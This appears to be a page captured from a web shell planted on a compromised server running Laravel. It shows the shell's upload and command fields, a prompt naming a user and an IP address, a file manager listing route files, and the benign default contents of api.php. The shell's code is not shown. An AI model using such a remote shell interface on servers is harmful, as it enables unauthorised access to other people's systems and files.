404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@18.223.125.226: ~ $
<?php

use Illuminate\Http\Request;
use Illuminate\Support\Facades\Route;

/*
|--------------------------------------------------------------------------
| API Routes
|--------------------------------------------------------------------------
|
| Here is where you can register API routes for your application. These
| routes are loaded by the RouteServiceProvider and all of them will
| be assigned to the "api" middleware group. Make something great!
|
*/

Route::middleware('auth:sanctum')->get('/user', function (Request $request) {
    return $request->user();
});

Filemanager

Name Type Size Permission Actions
admin.php File 4.33 KB 0644
api.php File 570 B 0644
channels.php File 558 B 0644
console.php File 592 B 0644
web.php File 2.18 KB 0644